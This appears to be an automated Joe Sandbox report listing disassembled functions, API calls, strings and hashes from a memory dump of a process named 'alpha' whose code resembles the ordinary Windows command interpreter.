                                                                                      • API ID: wcschr$iswdigit$wcstol
                                                                                      • String ID:
                                                                                      • API String ID: 3841054028-0
                                                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction ID: 72775493c192d36715b9cc2eecc7d2580efb2e91c676251f7f62ccced9c8acc1
                                                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction Fuzzy Hash: CE510723A04A52A1F7B4AB35D4A01B9B6A5FF6C759BC48231DE5D622D0DF3CE841C231
                                                                                      Function 00007FF7937534A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753514
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793753522
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753541
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF79375355E
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                      • String ID:
                                                                                      • API String ID: 4057327938-0
                                                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction ID: a582bde19aa0065ef1ab6d67d599b1339a4c6851de83f62700157bae693e8267
                                                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction Fuzzy Hash: 8431A121A08A4286F7F9BB3594801B9F6A8EF8D741FC4413AD94E627A1DF3CE9049670
                                                                                      Function 00007FF7937654B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937654E6
                                                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF79376552E
                                                                                        • Part of subcall function 00007FF79376758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675AE
                                                                                        • Part of subcall function 00007FF79376758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                      • API String ID: 779401067-630742106
                                                                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction ID: ecab872ab862bb5ac31dfab98c95c7e22a3d1aa193bea514396cd5fb561f79e6
                                                                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction Fuzzy Hash: C051C972618A8281EBB1AB31E4A47FAE365EF8C798FC44031DA0E67B55DE3CD405C721
                                                                                      Function 00007FF7937458D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                      • API String ID: 3677997916-3870813718
                                                                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction ID: edd0383eac29cc3befd8efa02ad1d4ed1bcb7bc0f2acef5670c0b9f9b8948afc
                                                                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction Fuzzy Hash: C1115E72618B41C7EB609B20E48426AF7A8FB89765F804231DB8D137A8DF7CD148CF10
                                                                                      Function 00007FF793744C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcsrchr$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 110935159-0
                                                                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction ID: ac86cb9b02b6d142be99b65d12e27b5bbc8461f1910960b4bcf6114e8ee6b853
                                                                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction Fuzzy Hash: 3551D722B0978285FEB1AB2198983F9D399BF4DBA4F894531CE5D2B7C4DE3CE5419310
                                                                                      Function 00007FF79374B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B4BD
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B518
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B58B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                      • String ID: ELSE$IF/?
                                                                                      • API String ID: 3223794493-1134991328
                                                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction ID: 44a51ca4b7972b9b0a796843889b356c3f4887dbcdcd015dbb18842c6d4bac6e
                                                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction Fuzzy Hash: C8414A21A0964381FBF4BB35A4D92BAE6AEAF4C744FC44039D54E663A5DE3CF8008761
                                                                                      Function 00007FF79376E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1532185241-0
                                                                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction ID: f39d3dc08ebb12bc9e39a97f9a341872957bdac2845b85c9a440d7c9298e6d70
                                                                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction Fuzzy Hash: 4F41F632A04B5187F7A4AB31E49557DFAA5FB8CB80F844535EA0A53B81CF3CE941CB21
                                                                                      Function 00007FF793744FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3588551418-0
                                                                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                      • Instruction ID: da2f3fb315c532be1588ef3813a7a38b8854d2a9c4a8b30fd263becd5125f8fc
                                                                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                      • Instruction Fuzzy Hash: 1241A431A086428BF7B46B31A4D427DF669EF4DB91F944039DA4E67791CE3CE8408760
                                                                                      Function 00007FF79376D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D0F9
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D10F
                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D166
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D17A
                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D18C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3008996577-0
                                                                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                      • Instruction ID: 975a45dd6b070c69b9798962f7c79023f63465ff99e22583da645b71387080a9
                                                                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                      • Instruction Fuzzy Hash: 69216D22B24A41CAF750AB71E4904BDB7B4FB4DB45B845125DE0EA3B98DF38D140CB65
                                                                                      Function 00007FF79376B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF79376B934
                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9A5
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                      • String ID: %WINDOWS_COPYRIGHT%
                                                                                      • API String ID: 1103618819-1745581171
                                                                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                      • Instruction ID: cfee13a5c693ba0bbda19f0cceb9b10cbe74937702e296b2ade4766c0f00dd46
                                                                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                      • Instruction Fuzzy Hash: E741B362A08F82C2EAA0AF2194A0279B7E4FB4DB95FC54235DE4D63395EF3CE441C710
                                                                                      Function 00007FF793769114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: fprintf
                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                      • API String ID: 383729395-2781220306
                                                                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                      • Instruction ID: c7961abc95c87a63e168d8f52d4caa0070f87552e671f145ac7facd0a327d36d
                                                                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                      • Instruction Fuzzy Hash: 5611C42190894291EBB9AB34D9940B9A26AEB4D7F4FD04332D57E632E4DF2CE841C361
                                                                                      Function 00007FF7937504F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                      • API String ID: 1646373207-2530943252
                                                                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                      • Instruction ID: 6639e58809975b004ca19671ef530676f4cb35533d9cac5f13a76d60c1c163ae
                                                                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                      • Instruction Fuzzy Hash: 63012160E09A42D1FAF8AB30A8D1174A6A8EF4E732FC40736C53F227E0DE3C65408761
                                                                                      Function 00007FF7937673C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                      • API String ID: 1646373207-919018592
                                                                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                      • Instruction ID: 3643b08356e982e0e71e851df98274708064b8515c2709bd0c1a2927a80420a3
                                                                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                      • Instruction Fuzzy Hash: 5AF03021618B8192F6506B22F4C4079EA64FF8DBD2B849134D94E23714CF3CD585C750
                                                                                      Function 00007FF793754878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
